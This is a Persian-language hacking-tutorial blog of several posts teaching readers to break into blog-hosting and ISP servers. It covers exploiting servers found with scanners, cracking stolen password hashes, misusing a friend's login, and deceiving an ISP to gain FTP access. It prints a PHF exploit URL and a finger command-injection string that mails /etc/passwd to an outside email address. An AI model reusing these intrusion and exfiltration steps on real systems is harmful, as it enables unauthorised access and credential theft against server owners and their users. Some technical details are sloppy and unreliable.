آموزش هک کردن وبلاگ

چندتا از دوستان به من ایمیل زده بودند و گفته بودن که آموزش هک کردن وبلاگ را بده من هم گفتم چشم اما دوستان عزیز یادتان باشد من به طور صریح و واضح این آموزش را نمی دم علتش هم به دلیل مسایل امنیتی است.یکی از دوستان از من پرسیدند که تو چه نوع هکری هستی؟کلاه سیاه یا کاله سفید؟ در جواب ایشان باید بگم که من یک هکر کلاه سفید هستم چون دوست ندارم برم وبلاگ ها یا سایت های مردم را بی خود و بی جهت هک کنم به نظر من اگر می خواهید یک هکر کلاه سیاه خوب شوید باید از مسایلی که هکرهای کلاه سفید با آن سر و کار دارند سر در بیارید چون هکرهای کلاه سیاه((اون طوری که من با چندتاشون صحبت کردم))می گن ما فقط دنبال راه های نفوذ به سیستم ها هستیم و با مسایل ضد هک زیاد آشنایی نداریم اما هکرهای کلاه سفید هم نحوه ی هک کردن را می دانند و هم ضد هک که این کمک بسیار بزرگی برای آن هاست چون وقتی بخوان به یک سیستم نفوذ کنند اما حالا به هر دلیل اون روش نفوذی شان نگیره می فهمند که قربانی چه کارهای امنیتی کرده و ضد آن را می زنند یا از راه های دیگر اقدام می کنند البته هر هکر حرفه ای وقتی ببینه نمی شه با یه روش وارد شد قطعا روش دیگر رو امتحان می کنه اما در مسایل بزرگ و سرورهای بزرگتر و مهمتر شاید نتواند آن کار را کند که دلیل اصلی اش کمبود اطلاعاتش است

خوب امروز هم همینطوری که گفتم می خوام روش هک کردن یک وبلاگ به صورت کاملا حرفه ای نه بچه بازی که برای صاحب وبلاگ یه تروجان یا یهMagic-Ps  بفرستیم بعد ببینیم که روشمون نگرفته و نا امید شیم.

آموزش هک کردن وبلاگ یا همان آموزش هک وبلاگ

هک کدن یک وبلاگ به صورت حرفه ای کار چندان ساده ای نیست و مستلزم این است که شما با مفاهیم کلی شبکه و کار با نرم افزارهای , IP sniffer  NMAP , Nessus  بلد باشید و بتوانید با Exploit  ها کار کنید البته من نمی خواهم شما را از این کار نا امید کنم ولی بهتر است این نرم افزارها و چیزهایی را که گفتم بلد باشید

خوب ما برای هک کردن یک وبلاگ باید سرور و یا سرویس دهنده ی آن را اول هک کنیم تا بتوانیم رمزها و یوزرنیم های وبلاگ یا وبلاگ های تحت سرویس آن سرور را پیدا کنیم معمولا یوزر نیم ها و یا همان آدرس وبلاگ مثل:

http://www.victim.blogserver.com/

که victim  آدرس و یوزر نیم وبلاگ است کد بندی نشده است و به راحتی پس از نفوذ به سرویس دهنده ی وبلاگ می توانیم آن را پیدا کنیم اما پسوردها معمولا کدبندی شده اند و ما باید با استفاده از ابزارهای  کرک پسورد،آن پسوردها را از حالت کد شده خارج کنیم که من در زیر اسم چندتا برنامه ی معروف کرک پسورد یا Password Cracker  را گذاشته ام:

John the ripper

L0pht crack

Palm crack

که می توانید با جستجو در گوگل لینک دانلود آن ها را پیدا کنید و پس از دانلود از آن ها استفاده کنید که کار با آن ها بسیار آسان است بدین ترتیب که شما کلمه ی کد شده را به آن می دید و برنامه نسبت به اندازه ی ((Length))  آن شروع به شکست کد آن می نماید.یادتان باشد که L0pht crack  بعد از حرف L  صفر یعنی0  را دارد نه O

حالا ما چگونه به یک سرور وارد شویم؟

شما می توانید با پیدا کردن Vulnerability  های یک سرویس دهنده ی وبلاگ به کمک برنامه های NAMP  و یا Nessus  و امتحان Exploit  های نوشته شده برای آن آسیب پذیری ها ((Vulnerability))  به سیستم سرور نفوذ کرده و کنترل آن را در دست بگیرید البته این یادتان باشد که فقط به قسمت اطلاعات سرور که معمولا دارای آسیب پذیری است نفوذ کنید و به قسمت های دیگر به هیچ عنوان نوذ نکنید در ضمن این کار با هک کردن سایت فرق می کند اما روش های نزدیک به همی برای انجام هر دوی آن ها استفاده می شود

البته بلاگفا تا چند روز پیش در رده ی دوم قرار داشت اما به دلیل اخذ تدابیر امنیتی خوب در رده ی پنجم جای گرفت.البته من این رده بندی را براساس تعداد وبلاگ های هک شده ی آن سرور،تدابیر امنیتی اتخاذ شده ی آن سرور،تعداد دفعاتی که خودم به آن سرور نفوذ کرده ام و سوال از حدود  16  هکر انجا داده ام.

البته اگر این را برای شما سخت است من در پست بعد روش دیگری را که کمی آسان تر است را به شما می گویم.

خوب این هم از آموزش هک کردن وبلاگ قسمت اول.

یکی از دوستان پرسیده بودند که برنامه ی THC-scan 2.0  را ار سایت اصلی اش دانلود کرده ام  اما موقعی که روی برنامه کلیک می کنم صفحه ی سیاهی می یاد و بعدش می ره چه کار کنم؟

دوست عزیز من آسان ترین راه را به شما می گویم اول برنامه یعنی فایل .exe  را به پوشه ی System 32  ویندوز خود ببرید و CMD  را اجرا کرده و نام برنامه را که در زیر آیکون قرار دارد را در آن بنویسید و Enter  کنید و پس از اجرا کار خود را انجام بدید

 نظرات یا دتون نره

آموزش هک سرور

ما برای شروع یک سری اطلاعات در باره ساختار اینترنت می خواهیم... اول از همه اینکه یک آدرس وبسایت که از این به بعد بهش می گیم Domain  (یادتون باشه) در حقیقت یک آدرس آی پی است... وقتی در مرورگر اینترنت خود آدرس یک وبسایت رو می نویسید٬  سرویس گری به نام DNS  این آدرس رو به آی پی ترجمه می کند... برای همین است که تا آدرس رو می نویسید و Enter  رامی زنید اون پایین برای چند لحظه کوتاه یه آی پی ظاهر می شود و بعد وب لود می شود... سایتی مثلwww.yahoo.com.com  در حقیقت برای اینکه حفظ کردنش راحتتر شده باشه به این شکل در اومده... یعنی در مرورگر اینترنت اگر شما به جای اسم سایت٬  ادرس آی پی اون رو بدین٬  خیلی سریعتر و راحت تر سایت براتون باز میشه... خب این از این حالا می رسیم به اینکه سرور هکینگ چه فرقی با کلاینت هکینگ داره... ببینید٬  تمامی فایل های یک سایت  ٬  یعنی اونهایی که به کمکشون سایت ها بالا می آیند و در حقیقت هدف اصلی ما  ٬  در پوشه ای به نام Inetpub  دخیره می شود ... این فایل ها شامل وبسایت٬  ایمیل ها اسکریپت ها و FTP  آنهاست ... خب ما اگه به این پوشه دسترسی پیدا کنیم٬  داخلش می رویم وپوشه هایی رو میبینیم که یکیشون wwwroot  است..این همونی است که ما می خواهیم ...داخل  ۰این پوشه حتما فایلی به نام index.htm  ویا main.htm  هست که صفحه اصلی را شامل می شود ... فایل های دیگه ای هم هست که صفحات دیگر وبسایت را شامل می شود... می رویم سراغ پوشه های دیگر در Inetpub  : پوشه بعدی نامش mailroot  است.... در این پوشه ایمیل ها و حساب های ایمیل موجود در این سرور را پیدا خواهید کرد. پوشه بعدی ftproot  میباشد٬٬٬  در این پوشه فایلهایی که با استفاده از FTP  بهشون دسترسی داریم مشخص می شود (اکثرا این پوشه رو برای همون وبسایت می گذارند) در مورد ftp  بعدا مفصل صحبت می کنم . با پوشه های دیگه هم کاری ندارم ولی بدونین که برای ذخیره اسکریپت ها و از اینجور کاراست ... خب در مورد ftp  هم توضیح مختصری می دم و برای امروز بسه : ftp  مخفف کلمه file transfer protocol  به معنی پیمان انتقال فایل است ... ما از این پروتکل (پروتکل به معنی رابطی است که در دوطرف یک ارتباط شبکه ای موجب انجام کار تبادل بسته اطلاعاتی می شود) برای تبادل فایل استفاده می کنیم٬٬٬  شما برای دسترسی به ftp  می توانید از برنامه های مختلفی استفاده کنید : مثلا بهترینشون خود بسته نوم افزاری ftp  در سیستم های عامل ویندوز و لینوکس است... البته کمی سخته در این حالت کار کردن چون محیطی شبیه داس دارد... اما راه بهتری وجود دارد : در هر مرورگری مانند Netscape,internet explorer,mozila, ... می توانید با صدور فرمان ftp://your/ FTP SERVER  به این سرویس دسترسی پیدا کنین... می تونین برای امتحان همین الان به ftp  خود مایکروسافت وصل بشین : مرورگر خود را باز کنین و در قسمت آدرس بنویسید : ftp://microsoft.com/  تا بعد از چند لحظه به یک پوشه جالب دسترسی پیدا کنین... این پوشه عین یکی از پوشه های سیستم خودتون است ... این فایل ها رو فقط می تونین بروی سیستم خود کپی کنین چون مایکروسافت اجازه تغییرات رو به شما نمی دهد.

رسیدیم به اونجا که از طریق ftp  میشد به فایل های یک سیستم دسترسی پیدا کرد خب حالا که فهمیدیم فایل های یک وبسایت کجا هستند و چه آرایشی دارن٬  آماده برای سرور هکینگ هستیم چون اگر روزی بتونین به یک سرور نفوذ کنین اون وقته که باید بدونین فایل های وب کجا هستند که کارهای خودتون رو بتونین انجام بدین ... حالا شروع می کنم به توضیح کارهایی که می تونیم انجام بدیم تا کنترل یک وبسایت دست ما بیاد : Telnet  : تلنت رو قبلا توضیح داده بودم٬  اما حالا به طور مفصل تر و قابل فهم تر برای سرور هکینگ بیان می کنم یه خرده مطلب براتون باز بشه ؛؛؛ ببینید٬  کار اصلی تلنت٬  جواب به پارامتر های ارسالی ما به درگاه های یک کامپیوتر است... خب یعنی چی؟ یعنی این که ما می دونیم یک سیستم چه درگاه های بازی دارد اما می خواهیم از این درگاه ها کار بکشیم؛ این کار رو تلنت برای ما انجام میده... مثلا وقتی شما ایمیل می فرستید یا میگیرید٬  در حقیقت از دو درگاه  ۲۵  و  ۱۱۰  استفاده می کنین و برنامه هایی که این کار (فرستادن و گرفتن نامه) را انجام میدهند در حقیقت واسط گرافیکی (GUI) همین تلنت خودمون هستند...این یعنی اینکه با استفاده از همین تلنت و محیط خسته کننده و یکنواخت آن٬  ما باید بتوانیم نامه بفرستیم و یا بگیریم٬٬٬  من هم میگم که میتونیم و طرز کار باهاش رو هم بعدا اگر وقت بود میگم یا این که می تونین توی وبسایت آراز صمدی اونو بخونین... خب ما از این تلنت اولین استفاده ای که می کنیم صحبت با درگاه  ۲۳  است که درگاه اختصاصی خود تلنت می باشد .به یاد داشته باشید که با تلنت با هر درگاهی میشه گفتگو کرد‌(البته به زبان خاص خودش) اما این درگاه مخصوص تلنت است و ما می تونیم خیلی باهاش حال کنیم :D  اما چطور ؟ : ببینید تلنت دو سرویس اصلی دارد که یکیش متغیر و دیگری حتما با رمز است حالا میگم چرا : سرویس اولی در حقیقت استفاده از اون سرور به عنوان یک سرویس دهنده فقط متنی است که یک پایگاه مثلا یک کتابخانه به شما ارایه می کنه تا با تلنت کردن به اون کتابخونه از راه دور٬  کنترل کنید کتابی که می خواهید در آن کتابخانه موجود هست یا نه که راه دوری رو تا کتابخانه طی نکنین و آخرش هم بفهمید که کتاب مورد نظر در دسترس نمی باشد !!! این یکی از استفاده های سرویس اولی تلنت است که ما در مورد کتابخانه گفتیم... خب به طور حتم این سرویس برای استفاده عموم است و پسوردی ندارد اما در بعضی موارد این سرویس با کلمه عبور محافظت می شود چون ممکن است اطلاعات موجود در آن سرور برای عموم نباشد و فقط افراد خاصی حق دارند از آن مطلع شوند؛ مثل اطلاعات نظامی یا امنیتی ! در این حالت حتما سرور با یک کلمه عبور محافظت میشود خب این سرویس اولی بود اما سرویس دومی‌ : در این حالت که حالت پیش فرض تلنت است ما با وصل شدن به اون سیستم به تمام فایل های اون سیستم دسترسی پیدا می کنیم و این همونی است که ما می خواهیم ! در این حالت حتما درگاه پسورد دارد و جالبه بدونین کلمه کاربری و رمز عبورش همون پسورد ورود به سیستم است یعنی همونی که شما با وارد کردنش وارد سیستم عامل (چه ویندوز و چه یونیکس) میشوید ... خب حالا باید فهمیده باشید که یک اکانت در یک سیستم که کلمه عبوری نداشته باشد چقدر خطرناک است ... باید اضافه کنم با نام کاربری و پسورد هر اکانتی که در سیستم تعریف شده باشد میتوان به سیستم تلنت کرد و این یعنی اوج خطر ... چون دسترسی به تمامی فایل های سیستم محیا می شود ...خودتون الان می فهمید که دسترسی به تمام فایل ها یعنی چی .. یعنی دسترسی به : Inetpub  و دسترسی به این فولدر هم یعنی هک ! زیاد حرف زدم قابل توجه اون کسانی که می خواهند تلنت روی سیستم خود را آزمایش کنند : در ویندوز های NT  ( یعنی ویندوز هایی با هسته NT  مانند  2000٬XP٬NT  و ...) در منوی Start  در قسمت RUN  بنویسید : Net Start Telnet  و بعد از چند لحظه درگاه  ۲۳  که همون درگاه تلنت است باز شده و با دستور Telnet localhost 23  وارد تلنت شده و از شما نام کاربری و کلمه عبور می خواهد ... با همون یوزر و پسورد که به سیستم عامل خود وارد شده اید در همینجا وارد کنید... در طی نوشتن نام کاربری و کلمه عبور شما هیچ نمی بینید ولی دستورات وارد میشود ؛ یادتون باشه اشتباه تایپ نکنین چون در تلنت نمی شه از Backspace  استفاده کرد /// حالا وارد سیستم خود شده اید و هرچی فایل داشتین در اینجا در محیطی شبیه داس میبینید... خب وقتی حسابی با این سرویس تلنت آشنا شدین وقتشه که درگاه تلنت رو در سیستم خود ببندید تا امنیت سیستم به خطر نیوفته //////////////// برای این کار از دستور Net Stop Telnet  در منوی StartRun  استفاده کنین... یه خرده با سیستم خود ور برین (!) تا مطلب بعدی آماده بشه...

با تشکر.مدیزیت سایت هکران نهاوند

آموزش هک سرور ۲

یکی از سرورهایی است که در جهان بسیار از آن استفاده می شود در ایران و دربیشتر شهر های بزرگ هم ISPهایی وجود دارند که سرور آن ها Unixباشند .بنابر این شما می توانید برای هک آن ها از این راه ها استفاده کنید شما در این راه احتمالا با مشکلات زیادی برخورد خواهید کرد .من راه کامل و بی عیبی را در اختیار شما نمی گذارم برای نفوذ گر شدن باید تلاش بسیاری کرد و این اشاره ای است که شما را به طرف راه درست هدایت می کند .برای هک یونیکس از این طریق عمل می کنند که با روش هایی که ذکر خواهد شد فایل حاوی Passwordها و IDها را که به نام Passwdمی باشد دریافت کنند .این فایل یک فایل متنی است که در آن اطلاعات بصورت رمز در آمده .وقتی شما یک فایل Passwdرا باز کنید چنین نوشته هایی را می بینید .که باید آن را از حالت رمز در آورد . root:2fkbNba29uWys:0:1:Operator:/:/bin/csh  admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh  Taha:3A62i9qr:1012:10:Mashhad  در اینجا مثلا Tahaنام IDو  3a62...کلمه عبور اما به صورت رمز در آمده می باشد . شاید فایل به شکل زیر هم باشد .اما این فایل کار را غیرممکن می سازد.در صورتی که به شکل زیر باشد یعنی در آن علامت *به جای کلمه ی به رمز آمده به آن ها Shadowedگفته می شود . root:*:0:1:Operator:/:/bin/csh  admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh  Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh  ما فعلا می خواهیم این فایل را دریافت کنیم .اولین قدم این است که آیدی در آن ISPبرای خود دست و پا کنیم .حالا این آیدی می تواند متعلق به دوستمان باشد و یا یک آشنای دور .پیدا کردن رمز دوست شما به سادگی میسر است که در حوصله این مقاله نمی گنجد .بعد از پیدا کردن رمز شما با آیدی دوستتان به شبکه Connectشوید .این اتصال می تواند یک اتصال به طریق Modem DialUp Connectionباشد .بعد از اتصال کامل وارد قسمت MS-DOS Promptشوید و فرمان زیر را وارد کنید FTP http://www.domain.com/ که Domainآدرس سرور ISPمی باشد سپس از شما خواسته می شود تا آیدی خود را وارد کنید کلمه ی Anonymousرا بزنید .سپس وقتی درخواست کلمه عبور شد کلید Enterرا بزنید .اگر وارد سیستم شدید موفق شده اید در غیر این صورت جمله ی login failedدریافت می شود .دوباره امتحان کنید و این بار در کادر Passwordآدرس Emailای را وارد کنید .اگر این بار هم جواب نداد به جای کلمه ی anonymousاز Userخود یعنی دوستتان استفاده کنید . احتمال دارد این بار هم موفق نشوید .این دفعه روش های فوق را برای دستور زیر امتحان کنید FTP ftp://ftp.domain.com/  اگر این بار هم جوابی نگرفتید با ISPتماس گرفته و سوال کنید که چگونه می توانم از سرور FTPخود شما استفاده کنم چون وارد سیتمتان نمی شود اگر پرسید برای چه می خواهید وارد شوید بگویید می خواهم از نرم افزار های آن استفاده کنم ولی مواظب باشید که نام خود را نگویید .خلاصه تمام تلاش خود را برای فهمیدن روش دستیابی به سیستم بکنید اگر توانستید وارد سیستم شوید به راحتی می توانید وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیرید ولی احتمال دارد که آن شاخه برای شما قفل شده باشد .برای کار با FTPباید دستورات FTPرا یاد داشته باشید .برای لسیت دستورات می توانید ?را تایپ کنید .ابتدا به شاخه ی ETCبروید می توانید فایل passwdرا در آنجا پیدا کنید .این فایل را بگیرید .اگر در آنجا نبود شاخه های دیگر را امتحان کنید .ولی به احتمال زیاد همانجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت PHFبگیرید .به این صورت که در Internet Browserخود آدرس زیر را وارد کنید . http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd  اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین کار را انجام دهید .این روش به شرطی جواب می دهد که Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه کنید . www.domain.com/cgi-bin/finger  اگر این آدرس کار نکند دیگر هیچ امیدی نیست اما اگر کار کند کادری جلوی شما ظاهر می شود که می خواهد نام مورد نظر خود را بدهید .آدرس زیر را وارد کنید . ID@domain.com ; /bin/mail you@somewhere.com  < etc/passwd  که در این آدرس IDشناسه کاربری یک شخص است که مثلا می توانید از آیدی دوستتان استفاده کنید domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یک نمونه است . bfh@internet.com  ; /bin/mail amir6_6_6@yahoo.com  < etc/passwd  با وارد کردن این دستور فایل Passwdبرای من به آدرس  3dhack@yahoo.com  پست می شود ! خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید که بهتر در غیر اینصورت باید بی خیال این روش شوید . حالا اگر فایل shadowedگیر آوردید بقیه ی متن را نخوانید چون کمکی به شما نمی کند و باید از روش های دیگری استفاده کرد .اما اگر یک فایل مثل نمونه اولی که در بالا بود گیر آوردید می توانید کار خود را ادامه دهید حالا شما نیاز به یک برنامه ی Unix  Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jackمی باشد .اما John Ripper  سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی www.hackersclub.com/km/frontpageبه دست بیاورید اما نمونه ی دیگری از این نمونه برنامه ها به کتابخانه هک به نام jill_v20  ارسال شد .با استفاده از این برنامه ها می توانید به هدف خود برسید . به همین راحتی ..... و روش بعد : +در آینده ای نزدیک اگه پیشنهادها زیاد تر بشه و این بر و بچ پرشین بلاگ گیر ندن یه آموزش آماده کردم که با عکس توضیح دادم این روش  99  درصد عملی است و انجام می شه من که مشکلی نداشتم

با تشکر.مدیزیت سایت هکران نهاوند